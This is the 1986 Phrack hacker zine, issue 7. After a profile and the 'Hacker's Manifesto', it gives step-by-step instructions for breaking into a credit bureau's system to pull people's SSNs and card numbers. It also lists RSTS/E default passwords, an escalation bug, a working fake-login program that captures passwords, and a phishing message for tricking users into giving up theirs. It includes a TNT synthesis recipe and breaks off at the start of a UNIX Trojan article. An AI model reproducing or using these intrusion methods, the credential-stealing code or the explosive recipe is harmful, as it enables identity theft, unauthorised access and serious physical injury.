1976 lines
93 KiB
Plaintext
1976 lines
93 KiB
Plaintext
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 1 of 10
|
||
|
||
September 25, 1986
|
||
|
||
Welcome to Phrack VII. I'm glad to be back to be able to create something like
|
||
this. It was rather hard from the hospital. Anyway, I'd like to take you
|
||
aside and talk to those of you who have various misconceptions about Phrack
|
||
Inc. First off, Phrack Inc. isn't written by myself, Knight Lightning, or
|
||
Cheap Shades. We merely collect the philes and distribute them in a group.
|
||
The articles within are the sheer responsibility of the author. If you do not
|
||
like the philes, talk to the author, not any of us, unless it says in the phile
|
||
that we wrote it, please.
|
||
|
||
Phrack World News is merely a sub-article of Phrack Inc. and it is written by
|
||
Knight Lightning. He is to be addressed for all comments about his
|
||
ever-controversial PWN, and we'd appreciate it if you'd not condemn the whole
|
||
publication just for a few articles.
|
||
|
||
Anyone can write for Phrack Inc. now. If you have an article you'd like
|
||
published or a story for Phrack World News, get in touch with one of us (Knight
|
||
Lightning, Taran King, and Cheap Shades) and as long as it fits the guidelines,
|
||
it should make it in. If you have been one of the many ragging on Phrack Inc.,
|
||
please, write a phile and see if you can improve our status with your help.
|
||
Thanks for your time. Later on.
|
||
|
||
Taran King
|
||
Sysop of Metal Shop Private
|
||
|
||
Featured in this Phrack Inc.:
|
||
|
||
1 Intro/Index by Taran King (2175 bytes)
|
||
2 Phrack Pro-Phile of Scan Man by Taran King (7133 bytes)
|
||
3 Hacker's Manifesto by The Mentor (3561 bytes)
|
||
4 Hacking Chilton's Credimatic by Ryche (7758 bytes)
|
||
5 Hacking RSTS Part 1 by The Seker (11701 bytes)
|
||
6 How to Make TNT by The Radical Rocker (2257 bytes)
|
||
7 Trojan Horses in Unix by Shooting Shark (12531 bytes)
|
||
8 Phrack World News VI Part 1 by Knight Lightning (15362 bytes)
|
||
9 Phrack World News VI Part 2 by Knight Lightning (16622 bytes)
|
||
10 Phrack World News VI Part 3 by Knight Lightning (16573 bytes)
|
||
_______________________________________________________________________________
|
||
|
||
|
||
|
||
=========================================================================
|
||
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 2 of 10
|
||
|
||
==Phrack Pro-Phile IV==
|
||
|
||
Written and Created by Taran King
|
||
|
||
June 28, 1986
|
||
|
||
Welcome to Phrack Pro-Phile IV. Phrack Pro-Phile is created to bring info to
|
||
you, the users, about old or highly important/controversial people. This
|
||
month, I bring to you one of the most influential users of our times and of
|
||
days of old...
|
||
|
||
Scan Man
|
||
~~~~~~~~
|
||
|
||
Scan Man is the sysop of Pirate 80 (P-80), a telcom enthusiasts' bulletin board
|
||
in Charleston, West Virginia (304).
|
||
-------------------------------------------------------------------------------
|
||
Personal
|
||
~~~~~~~~
|
||
Handle: Scan Man
|
||
Call him: Scan Man
|
||
Past handles: None
|
||
Handle origin: Thought it up while writing a scanning program.
|
||
Date of Birth: 8/30/53
|
||
Age at current date: 32 years old
|
||
Height: 6'1
|
||
Weight: About 225 lbs.
|
||
Eye color: Green
|
||
Hair Color: Dark Blond to Light Brown
|
||
Computers: 2 TRS Model I's (one of which the BBS is run on), Tandy
|
||
Model 1000 (IBM Compatible), a 132 Column Dot Matrix, a
|
||
132 Column Daisy Wheel, a Model 100 Portable, a TRS Color
|
||
Computer, and a backup 80 Column Dot Matrix Printer.
|
||
Sysop/Co-Sysop of: Pirate 80 (P-80)
|
||
|
||
-------------------------------------------------------------------------------
|
||
Scan Man started out in the BBS world about 7 years ago when he first got his
|
||
modem, a 300 Baud Auto-Answer/Auto-Dial Micro-Connection Modem (made by Micro
|
||
Peripheral Corp.) with tape input and output. Pirate 80 went up 4 years ago
|
||
this Halloween, which consisted of a TRS Model 1, 3 40 track, single sided,
|
||
double density floppies, and a 300 baud modem (which held up until 6 months
|
||
ago).
|
||
|
||
At the time of arising, the board was put up for interests in phreaking,
|
||
hacking, as well as pirating. Within the first 6 months to now, Scan Man had
|
||
gone through 6 BBS programs, and is quite satisfied with the current one.
|
||
|
||
First, he started with a pirated version of TBBS 1.2, then an upgrade to 1.3,
|
||
pirated again (occurred and at the same time a hard drive was added after a
|
||
number of disk drive changes and modifications). Scan Man, through his BBS
|
||
(which was in the first 5 all phreak/hack BBS's to ever go up, and is the
|
||
oldest phreak board in the country), has met or talked to what he considers
|
||
"anybody who is anybody".
|
||
|
||
At 11 years old, he found a few old phones, took them apart, and got them
|
||
working, which was when his interest in telecom arose. He was led into the
|
||
phreak world when he became aware that he could phreak (articles he read such
|
||
as blue box articles). At the time, BBS's and personal computers did not exist
|
||
at this time.
|
||
|
||
The first board he called that involved phreaking was the old Pirate's Harbor.
|
||
An anonymous message posted there had a few alternate long distance service
|
||
codes posted. He was very excited that he had stumbled upon this thrill and he
|
||
spent the first year or so calling around finding exactly what everyone was
|
||
into and from there forward he started manufacturing various devices with The
|
||
Researcher. They worked together and learned together.
|
||
|
||
Because so much information posted was inaccurate, they did this to make it
|
||
accurate and found out what was the real stories. The more memorable phreak
|
||
boards that he was on included Plovernet, (and all pre-Plovernet), L.O.D., AT&T
|
||
Phone Center, Pirates of Puget Sound, as well as a few others which he couldn't
|
||
remember offhand because it was so long ago.
|
||
|
||
Scan Man's works as a computer consultant (systems analyst). He checks
|
||
security as well as enhancements, improvements, and debugging. He's been doing
|
||
this for about a year now.
|
||
|
||
Scan Man's hack/phreak interests are unknown to his employers. He has attended
|
||
various things including sneaking into a seminar on the DMS-250 Digital
|
||
Switching System, and before that, TelePub'86, and he's sneaked into other
|
||
various telcom/computer security seminars. He starts one project at a time and
|
||
does things step by step. He's very concentrated in his projects.
|
||
|
||
Scan Man frowns upon groups and says, "If you're any damn good at all, you're
|
||
going to get a reputation whether you like it or not."
|
||
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Interests: Telecommunications (modeming, phreaking, hacking, satellite
|
||
scanning), white water rafting, snow skiing, dancing (he used to be
|
||
a roller skating dance/disco instructor), and boating.
|
||
|
||
Scan Man's Favorite Things
|
||
--------------------------
|
||
Foods: Junk food, or an expensive restaurant once a week or so.
|
||
Movies: He's a movie buff, and goes regularly, by himself even.
|
||
Animals: He's an animal lover.
|
||
Pyrotechnics: They manufacture various fireworks as a hobby.
|
||
|
||
|
||
Most Memorable Experiences
|
||
--------------------------
|
||
The Newsweek Incident with Richard Sandza.
|
||
Last year's New Years' Phreak Party.
|
||
|
||
Some People to Mention
|
||
----------------------
|
||
The Researcher (for helping him out in starting out with phreak/hacking.)
|
||
The Coco Wizard (helped a lot with the BBS and the hardware on the computer.)
|
||
King Blotto, Mr. Gucci, and The Scanner (people he could do without.)
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Scan Man dislikes the bickering and fighting between the phone phreaks of
|
||
modern day because they're just fighting to climb the social ladder. He
|
||
dislikes the current phone phreaks because they're not in it to learn, and are
|
||
only in it to gain a big reputation. The old phreaks were those that wanted to
|
||
be there because they were a student of the network and had a true desire to
|
||
learn. It's become an ego/power-trip of the modern teenage America. They're
|
||
only in it to impress other people, and write philes just to get the
|
||
reputation, rather than to write it for the information in it, and collect them
|
||
only to say their collection is sizable. He feels that credit cards are voodoo
|
||
because it seems to be what people and sysops get busted for the most.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
|
||
the near future. And now for the regularly taken poll from all interviewees.
|
||
|
||
Of the general population of phreaks you have met, would you consider most
|
||
phreaks, if any, to be computer geeks? 90% of the phreaks, yes. 10% or less
|
||
are in it to learn. He respects that small percentage. Thank you for your
|
||
time, Scan Man.
|
||
|
||
Taran King
|
||
Sysop of Metal Shop Private
|
||
_______________________________________________________________________________
|
||
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 3 of 10
|
||
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
The following was written shortly after my arrest...
|
||
|
||
\/\The Conscience of a Hacker/\/
|
||
|
||
by
|
||
|
||
+++The Mentor+++
|
||
|
||
Written on January 8, 1986
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
Another one got caught today, it's all over the papers. "Teenager
|
||
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
|
||
Damn kids. They're all alike.
|
||
|
||
But did you, in your three-piece psychology and 1950's technobrain,
|
||
ever take a look behind the eyes of the hacker? Did you ever wonder what
|
||
made him tick, what forces shaped him, what may have molded him?
|
||
I am a hacker, enter my world...
|
||
Mine is a world that begins with school... I'm smarter than most of
|
||
the other kids, this crap they teach us bores me...
|
||
Damn underachiever. They're all alike.
|
||
|
||
I'm in junior high or high school. I've listened to teachers explain
|
||
for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
|
||
Smith, I didn't show my work. I did it in my head..."
|
||
Damn kid. Probably copied it. They're all alike.
|
||
|
||
I made a discovery today. I found a computer. Wait a second, this is
|
||
cool. It does what I want it to. If it makes a mistake, it's because I
|
||
screwed it up. Not because it doesn't like me...
|
||
Or feels threatened by me...
|
||
Or thinks I'm a smart ass...
|
||
Or doesn't like teaching and shouldn't be here...
|
||
Damn kid. All he does is play games. They're all alike.
|
||
|
||
And then it happened... a door opened to a world... rushing through
|
||
the phone line like heroin through an addict's veins, an electronic pulse is
|
||
sent out, a refuge from the day-to-day incompetencies is sought... a board is
|
||
found.
|
||
"This is it... this is where I belong..."
|
||
I know everyone here... even if I've never met them, never talked to
|
||
them, may never hear from them again... I know you all...
|
||
Damn kid. Tying up the phone line again. They're all alike...
|
||
|
||
You bet your ass we're all alike... we've been spoon-fed baby food at
|
||
school when we hungered for steak... the bits of meat that you did let slip
|
||
through were pre-chewed and tasteless. We've been dominated by sadists, or
|
||
ignored by the apathetic. The few that had something to teach found us will-
|
||
ing pupils, but those few are like drops of water in the desert.
|
||
|
||
This is our world now... the world of the electron and the switch, the
|
||
beauty of the baud. We make use of a service already existing without paying
|
||
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
|
||
you call us criminals. We explore... and you call us criminals. We seek
|
||
after knowledge... and you call us criminals. We exist without skin color,
|
||
without nationality, without religious bias... and you call us criminals.
|
||
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
|
||
and try to make us believe it's for our own good, yet we're the criminals.
|
||
|
||
Yes, I am a criminal. My crime is that of curiosity. My crime is
|
||
that of judging people by what they say and think, not what they look like.
|
||
My crime is that of outsmarting you, something that you will never forgive me
|
||
for.
|
||
|
||
I am a hacker, and this is my manifesto. You may stop this individual,
|
||
but you can't stop us all... after all, we're all alike.
|
||
|
||
+++The Mentor+++
|
||
_______________________________________________________________________________
|
||
|
||
|
||
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 4 of 10
|
||
|
||
-=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
|
||
|
||
-=:> Hacking The <:=-
|
||
-=:> Chilton Corporation Credimatic <:=-
|
||
-=:] By: Ryche [:=-
|
||
|
||
-=:} Written on June 24, 1986 {:=-
|
||
|
||
-=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
|
||
|
||
This is the complete version of Hacking Chilton. There is another one that is
|
||
floating around that's not as complete. If you see it anywhere please ask the
|
||
sysop to kill it and put this one in its place.
|
||
|
||
The Chilton Corp. is a major credit firm located on Greenville Ave. in Dallas,
|
||
Texas. This is where a lot of the companies that you apply for credit, check
|
||
you and your neighbors credit records. Unlike other credit systems such as TRW
|
||
and CBI, this one contains the records for people with good credit and doesn't
|
||
wipe out some of the numbers of the cards themselves. All information is
|
||
complete and includes full numbers as well as the bank that issued it, limit,
|
||
payments due, payments late, their SSN, current & former address, and also
|
||
their current and former employer. All you need to know to access this info is
|
||
the full name, and address of your "victim".
|
||
|
||
Now, how to hack the Chilton. Well, the Chilton system is located in Dallas
|
||
and the direct dialup (300/1200) is 214-783-6868. Be in half duplex and hit
|
||
return about 10 times until it starts to echo your returns. There is a command
|
||
to connect with E-mail that you can put in before echoing return. By echoing
|
||
the return key your signifying that you want the credit system. I wont go into
|
||
E-mail since there is nothing of special interest there in the first place. If
|
||
you are interested in it, try variations of /x** (x=A,B,C,etc.). All input is
|
||
in upper case mind you. Back to the credit part, once you echo return, you can
|
||
type: DTS Ctrl-s if you really need to see the date and time or you can simply
|
||
start hacking. By this, I mean:
|
||
SIP/4char. Ctrl-s
|
||
|
||
This is the Sign In Password command followed by a 4 character alpha numeric
|
||
password, all caps as I said before. You can safely attempt this twice without
|
||
anyone knowing your there. After the third failed attempt the company printer
|
||
activates itself by printing "Login Attempt Failed". This is not a wise thing
|
||
to have printed out while your trying to hack into it since there is always
|
||
someone there. If you try twice and fail, hit Ctrl-d, call back, echo, and try
|
||
again. You can keep doing this as long as you wish since there is no other
|
||
monitoring device than that printer I mentioned before. Since this only
|
||
activates when you fail to login correct you can safely say there is little if
|
||
no danger of your discovery. I would suggest going through an extender though
|
||
since Chilton does have access to tracing equipment. About the passwords, as
|
||
far as I know, there are 3 different classes of them with varying privileges,
|
||
these are:
|
||
|
||
1-User/Employee
|
||
2-Permanent/Secretary
|
||
3-Input Output
|
||
|
||
The first one is just to look and pull credit reports. These passwords go dead
|
||
every Sunday night at 11:00pm or so. The new ones are good from Monday to
|
||
Sunday night. Even though your pass is good for one week, there are limited
|
||
times you can use this. The credit system is only accessible at these times:
|
||
Mon-Fri: 8:00am to 11:00pm, Sat: 8:00am to 9:00pm, and Sun: 8:00am to 6:00pm
|
||
The second class is the same as the first except that these only change
|
||
whenever someone leaves the company. These were originally supposed to be set
|
||
up for the secretaries so that if they ever need quick access they could w/o
|
||
having to go down to the Credit Dept. every week for a new password. The
|
||
third is one I have never gotten..yet. It has the ability to alter a persons
|
||
credit reports for one month. At the first of the month the system updates all
|
||
reports and changes your alterations to the credit reports. Doing this though
|
||
would warrant going through a diverter since your fucking with someone's life
|
||
now. Once you have hacked a pass and it accepts the entry it will display the
|
||
warning:
|
||
|
||
****WARNING! UNAUTHORIZED ACCESS OF THIS SYSTEM IS A FEDERAL CRIME!****
|
||
|
||
Or something along the same lines. After this you should be left to input
|
||
something. This is where you enter either In House Mode, System Mode, or
|
||
Reporting Mode. In House Mode will give you the reports for the people living
|
||
in Dallas/Fort Worth and surrounding counties. System Mode is good for
|
||
surrounding states that include:
|
||
|
||
Massachusets, Illinois, Louisiana, Missouri, Arkansas, New Mexico, Colorado,
|
||
Arizona, some of New Jersey, and a few others I cant remember. There are 11
|
||
states it covers.
|
||
|
||
Reporting is a mode used for getting transcripts of a persons reports and would
|
||
require you to input a companies authorization number. So for this file lets
|
||
stick to In House and System. Get your victims stats ready and enter a mode:
|
||
|
||
In House: I/NH Ctrl-s (Dallas/Ft. Worth 214)
|
||
System: I/S Ctrl-s (All other NPA's)
|
||
|
||
After that its time to pull records. Type in:
|
||
|
||
I/N-Last Name/F-First Name/L-Street Name/Z-Zip Code/** Ctrl-s
|
||
|
||
If you don't know his street name, use 'A' and it will go into a global search
|
||
routine until it finds name that match or are at least 80% similar to the one
|
||
you used. Although the Zip Code is not needed and can be left out, it does
|
||
narrow the search field down considerably. Once it finds the name, it will
|
||
show you his Name, SSN, Current Address, Employer, and former ones if there
|
||
are any. Right after his name you will see a ID number. Sorta like: 100-xxxxx
|
||
Write this down as it is your key to getting his reports. After it finishes
|
||
listing what it has on him its time to see the full story. Type:
|
||
|
||
N/100-xxxxx/M/D Ctrl-s
|
||
|
||
What it will display now is his whole credit history. When you first pulled
|
||
his ID number you might have seen he had two names but with a variance like
|
||
middle name or a misspelled address. Pull both of them as they are just an
|
||
error in whoever put the reports in. I would suggest capturing this so that
|
||
you can refer back to it w/o having to access the system every time.
|
||
|
||
There is another way to get into Chilton through Tymnet but I have no idea of
|
||
the address for this and its a waste of time. If you happen to get the name
|
||
and address of an employee of the company forget the idea of pulling his
|
||
stats, Chilton doesnt allow employee records to be in there. One very good
|
||
point made not too long ago is the prospect of going through the phone book
|
||
and picking names at random.
|
||
|
||
Although Credit Card numbers are displayed credit card fraud is thwarted by
|
||
the small fact that it does not show expiration dates. No company making an
|
||
actual inquisition on a person would need that information and to prevent the
|
||
fraudulent or misuse of the information they were left out. There is an
|
||
interesting note that at one time in the companies history they did have a
|
||
small that signified a drug record. This was taken out as it wasn't
|
||
pertinent to the computers purpose and was only there because Borg Warner, the
|
||
company that owns Chilton wanted to pry into peoples lives. The computer has a
|
||
10 line rotary, so unless there are 11 people using it at the same time your
|
||
chances of getting a busy signal are almost if not next to nil.
|
||
|
||
Disclaimer:
|
||
|
||
The information provided in this file is a tutorial and is provided for the
|
||
purpose of teaching others about this system and how it operates. It is not
|
||
provided to promote the fraudulent use of credit cards or any other such
|
||
action(s) that could be considered illegal or immoral. Myself, and the
|
||
editors/publishers/distributors of this newsletter are in no way responsible
|
||
for the actions or intentions of the reader(s) of this file.
|
||
|
||
<>>>> Ryche <<<<>
|
||
_______________________________________________________________________________
|
||
|
||
|
||
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 5 of 10
|
||
|
||
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
||
$ $
|
||
$ PROGRAMMING RSTS/E $
|
||
$ File1: Passwords $
|
||
$ $
|
||
$ by: The Seker $
|
||
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
||
$ Written (c) May 22, 1986 $
|
||
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
||
|
||
PREFACE:
|
||
--------
|
||
|
||
This document is first in a series of ongoing files about using the
|
||
RSTS/E operating system. All the files are based on version 8.0 as it is
|
||
almost fully compatible with the previous releases. If the need arises I have
|
||
made sure to note differences between V8.x and V9.x.
|
||
Credit goes to High Evolutionary for urging me to write these files; to
|
||
Night Stalker for sharing info; and to all other RSTS hackers that have
|
||
contributed in some way or another.
|
||
|
||
HISTORY:
|
||
--------
|
||
The RSTS/E (Resource System Time Sharing /Environment) operating system
|
||
was developed for the PDP/11 series of minicomputers created by DEC. (Digital
|
||
Equipment Corporation) It was developed with ease of use for the user (and
|
||
hacker) in mind. Because of this, there have been a lot of overlooked errors
|
||
leaving the system with quite weak security. In later versions, especially
|
||
the 9.x series password security has been greatly improved and is more secure,
|
||
but still has plenty of bugs for us to breach.
|
||
|
||
LOGGING ON:
|
||
-----------
|
||
Briefly.. locate a valid number and connect. Hit c/r (carriage return) a
|
||
few times or type:
|
||
HELLO
|
||
The system should identify itself displaying to you who owns it, what version
|
||
they're running under, the date, and the time. Then it will prompt for an
|
||
account number and a password.
|
||
Accounts are in a PPN (Project Program Number) format. This is actually
|
||
two numbers each between 0 and 254 separated by a comma or a slash. (eg. 3,45
|
||
or 27/248) Privileged accounts which you should hopefully be striving for all
|
||
start with a 1. So start hacking 1,x accounts.
|
||
Passwords are 1-6 characters long. They are only alphanumeric so you
|
||
don't have to worry about all that other shit being included. On V9.x systems
|
||
passwords may be up to 8 characters if the operator has changed the default
|
||
length. But this rarely ever happens as most ops are too lazy.
|
||
Common passwords are:
|
||
SYSLIB
|
||
SYSGEN
|
||
SYSCON
|
||
SYSMGR
|
||
SYSOPR
|
||
SYSTEM
|
||
OPRATR
|
||
RSTS
|
||
DECNET
|
||
GAMES
|
||
YYYYYY
|
||
XXXXXX
|
||
XYXYXY
|
||
DATA
|
||
RICH
|
||
XXX
|
||
AAA
|
||
Many of those have been rumored to be defaults. But actually I think the
|
||
true default (if there is one!) password is:
|
||
RSTSE
|
||
Also, accounts that have a password of:
|
||
??????
|
||
are only accessible by operators.
|
||
Remember to try names, cars, objects, the name of the company (in
|
||
different variations), etc. Cause most people generally pick passwords that
|
||
have some relation to their private life.. Take a little time and guess...
|
||
|
||
YOUR IN!
|
||
--------
|
||
Once you have succeeded in hacking out a valid password, whether it be
|
||
privileged or not, I suggest you find out who is logged onto the system. You
|
||
can do this simply by typing:
|
||
SY
|
||
This will tell you everyone logged on, what they are doing at the moment,
|
||
their job number, whether they are attached or detached, and a hell of a lot of
|
||
other crap. What you are looking for is someone else logged in under the same
|
||
account you are. If you find another user in the same account you hacked, log
|
||
off and call back later. This will prolong the life of your account and
|
||
prevent a rise in suspicion by the sysops. Remember, every system keeps a log
|
||
of what you do, and if two people are logged in under the same account many
|
||
times the sysops will delete or change the password to that account.
|
||
If everything checks out okay, you're free to do as you please. To list
|
||
the files in your allotted space type:
|
||
DIR
|
||
or to see all the files on the system type:
|
||
DIR (*,*)
|
||
NOTE: [ ] may be used in place of ( ) when dealing with files.
|
||
* acts as a wildcard on the RSTS system and can be used in place of
|
||
account numbers when searching for specific files. Speaking of searching for
|
||
files; to run a file type:
|
||
RUN filename.filetype
|
||
where filename = the file you wish to run, and filetype = the extension.
|
||
Experiment! Try what you will. If you ever need help just type:
|
||
HELP
|
||
Read the files contained within help. They are very detailed and I
|
||
guarantee can help you with what ever it is you need done.
|
||
One other thing, a few useful control characters are:
|
||
^C Breaks out of whatever your doing
|
||
^R Repeats last line typed
|
||
^X If ^C doesn't work, this may
|
||
^O Use to stop the flow of text without aborting the function in process
|
||
^T Tells status and runtime of terminal
|
||
^U Deletes line presently being typed in
|
||
^H Deletes characters
|
||
^S Transmission off
|
||
^Q Transmission on
|
||
|
||
GAINING PRIVILEGES:
|
||
-------------------
|
||
If you weren't able to hack out a privileged account don't panic. There
|
||
are still a few other ways for you to attain sysop status. These methods may
|
||
not always work, but they are worth a try.
|
||
]SYSTEM LOG[
|
||
On many RSTS/E systems before V9.0 there is one account dedicated to
|
||
keeping the system log; everything you and everyone else does. I have found
|
||
this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
|
||
directory find to make sure. Type:
|
||
DIR (*,*)OPSER.LOG
|
||
or if nothing appears from that type:
|
||
DIR (*,*)SYSLOG.*
|
||
or
|
||
DIR (*,*)
|
||
Look for a file similar in name to that and mark down the account it
|
||
appears in. Now that you know which account the system log resides in logoff.
|
||
BYE
|
||
Then sign back on using the account in which the file was in. For
|
||
password try one of the following:
|
||
OPSER
|
||
OPSLOG
|
||
LOG
|
||
OPS
|
||
OOPS
|
||
OPRATR
|
||
SYSLOG
|
||
SYSTEM
|
||
These are common passwords to that account. If none of these work your
|
||
out of luck unless you can think of some other password that may be valid.
|
||
]SYSTEM BUGS[
|
||
When operating systems as complex as RSTS/E are created there will
|
||
undoubtedly be a few bugs in the operation or security. (Sometimes I am not
|
||
sure if these are intentional or not.) These can often be taken advantage of.
|
||
One that I know of is RPGDMP.TSK. To use this type:
|
||
RUN (1,2)RPGDMP
|
||
It will ask for a filename, and an output device. Give it any filename on
|
||
the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
|
||
the specified device. (db1:, screen, etc).
|
||
Credit for this goes to The Marauder of LOD for finding, exposing and
|
||
sharing this bug with all.
|
||
If you find any other bugs similar to this, I would appreciate your
|
||
getting in touch with and letting me know.
|
||
|
||
GETTING PASSWORDS:
|
||
------------------
|
||
Now that you've hopefully gotten yourself priv's we can get on with these
|
||
files. Getting many passwords is a safety procedure, kind of like making a
|
||
backup copy of a program. There are a number of ways to get yourself
|
||
passwords, the easiest is by using privileges, but we will discuss that in a
|
||
later file. The methods I am going to explain are the decoy and a trick I like
|
||
to use, which I call the mail method.
|
||
]DECOY[
|
||
The decoy, commonly called a Trojan Horse, (which is something completely
|
||
different) is a program which emulates login.bac. When the unsuspecting user
|
||
enters his account and password you have your program store it into a file that
|
||
you can retrieve later. Here is a short program I've written that will preform
|
||
this task:
|
||
|
||
type NEW and it will prompt for a filename. Enter something not to obvious.
|
||
|
||
1 ! RSTSE Decoy
|
||
2 ! Written by The Seker (c) 1986 TOK!
|
||
5 extend
|
||
10 print:print
|
||
20 &"RSTS V8.0-07 TOK Communications Ltd. Job 7 <Dial-up> KB41
|
||
";date$(0);" ";time$(0)
|
||
30 print
|
||
40 &"User: ";
|
||
50 open "KB:" for input as file 1
|
||
60 on error goto 300
|
||
70 input 1,proj%,prog%
|
||
80 z$=sys(chr$(3%))
|
||
90 &"Password: ";
|
||
100 on error goto 300
|
||
110 input 1,pass$
|
||
120 print:z$=sys(chr$(2%))
|
||
130 close 1
|
||
140 open "SYSLIB.BAC" for output as file 2
|
||
150 print 2,proj%
|
||
160 print
|
||
2,prog%
|
||
170 print 2,pass$
|
||
180 close 2
|
||
200 print:print
|
||
210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
|
||
300 if erl=70 then goto 350
|
||
310 if erl=110 then goto 360
|
||
350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
|
||
200 else resume 30
|
||
360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
|
||
90
|
||
999 end
|
||
|
||
The program as I said emulates login.bac, then logs the person off after a
|
||
few tries. Save this program. Then run it. When it starts, just drop the
|
||
carrier. The next person to call within 15 minutes will get your imitation
|
||
login.
|
||
If you are working on an older system like V7.0 change line 40 to read:
|
||
40 &" ";
|
||
NOTE: This will not work without modifications on releases after V8.7. An
|
||
improved and updated version of this program will be released as a small file
|
||
at a later date.
|
||
Next time you login and you want to recover the file type:
|
||
TYPE SYSLIB.BAC
|
||
It should print out the account and password. If you set this running
|
||
each time you plan on hanging up within a few days you'll have yourself a
|
||
handful of valid accounts.
|
||
]MAIL[
|
||
To run mail type:
|
||
RUN $MAIL
|
||
The mail method is probably used by many hackers and since I like to use
|
||
it, I thought I'd tell you what it was.
|
||
When you run the program the utility will tell you exactly how to use
|
||
itself. Assuming you know a little about it anyway we will get on with the
|
||
file. The object is to send mail to another user and try and convince him/her
|
||
you are the sysop and are writing him/her to validate their password. Don't
|
||
try this with a priv'd user! It would result in instant deletion.
|
||
Here's basically what you'd type:
|
||
|
||
Hello. We are contacting each of the users and validating their records to
|
||
keep our files up to date. If you would cooperate and leave me a response which
|
||
includes your full name, account number, and password we would appreciate your
|
||
help.
|
||
|
||
John Doe
|
||
System's Operator
|
||
4,11
|
||
|
||
As you can see the idea is to con a user into believing you are one of the
|
||
system ops. I would say this method works approximately 70% of the time on
|
||
most systems since users often times don't associate with sysops. Use a
|
||
different name if you try this though, as John Doe wouldn't fool anyone. (Be
|
||
creative) Also the 4,11 is the account you'd like them to leave the response
|
||
too.
|
||
You can try a few variations of this if you like. For example, if the
|
||
system you're hacking has a chat program:
|
||
|
||
RUN $TALK
|
||
|
||
You can just talk live time to them. Or if you somehow (like trashing) manage
|
||
to get a list of all the users and their phone numbers, you can call them up
|
||
and bullshit them.
|
||
|
||
NOTE: This document is intended for informational purposes only. The author
|
||
is in no way responsible for how it is used. Sysops are free to
|
||
display this at their will as long as no information within is altered
|
||
and all acknowledgements go to The Seker.
|
||
|
||
|
||
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 6 of 10
|
||
|
||
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
|
||
Xx xX
|
||
Xx American Dynamite xX
|
||
Xx xX
|
||
Xx By The Rocker xX
|
||
Xx of xX
|
||
Xx Metallibashers Inc. xX
|
||
Xx xX
|
||
Xx for: ==Phrack Inc.== xX
|
||
Xx xX
|
||
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
|
||
|
||
Recipe:
|
||
|
||
Mix 170 parts tolulene with 100 parts acid. The acid made of 2 parts of 70%
|
||
nitric and 3 parts of 100% sulfuric. Mix below 30 degrees. Set this down for
|
||
30 min. and let it separate. Take the mononitrotolulene and mix 100 part of it
|
||
with 215 parts of acid. This acid is 1 part pure nitric and 2 parts pure
|
||
sulfuric. Keep the temperature at 60- 70 degrees while they are slowly mixed.
|
||
Raise temp to 90-100 and stir for 30 min. The dinitrotoluene is separated and
|
||
mix 100 parts of this stuff with 225 parts of 20% oleum which is 100% sulfuric
|
||
with 20% extra dissolved sulfur trioxide, and 65 parts nitric acid. Heat at
|
||
95 degrees for 60 min. Then at 120 degrees for 90 min.
|
||
|
||
Separate the trinitrotoluene and slosh it around in hot water. Purify the
|
||
powder by soaking it in benzyne.
|
||
|
||
Presto! American Dynamite!
|
||
|
||
Thanx to S.A. for the idea! Thanx to Phrack Inc. for just being a sponsor!
|
||
|
||
Don't forget to call these systems after you obliterate someone's house with
|
||
that T.N.T...
|
||
=======================================
|
||
Speed Demon Elite..........415/522-3074
|
||
High Times.................307-362-1736
|
||
Metalland South............404-576-5166
|
||
Brainstorm Elite...........612-345-2815
|
||
Atlantis...................215-844-8836
|
||
=======================================
|
||
|
||
Metallizing,
|
||
The Rocker/MBI
|
||
|
||
|
||
=========================================================================
|
||
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 7 of 10
|
||
|
||
------------------
|
||
UNIX Trojan Horses
|
||
------------------
|
||
|
||
By Shooting Shark of Tiburon Systems / R0DENTZWARE - 6/26/86
|
||
|
||
Introduction
|
||
------------
|
||
|
||
"UNIX Security" is an oxymoron. It's an easy system to brute-
|
||
force hack (most UNIX systems don't hang up after x number of login
|
||
tries, and there are a number of default logins, such as root, bin,
|
||
sys and uucp). Once you're in the system, you can easily bring
|
||
it to its knees (see my previous Phrack article, "UNIX Nasty Tricks")
|
||
or, if you know a little 'C', you can make the system work for you
|
||
and totally eliminate the security barriers to creating your own
|
||
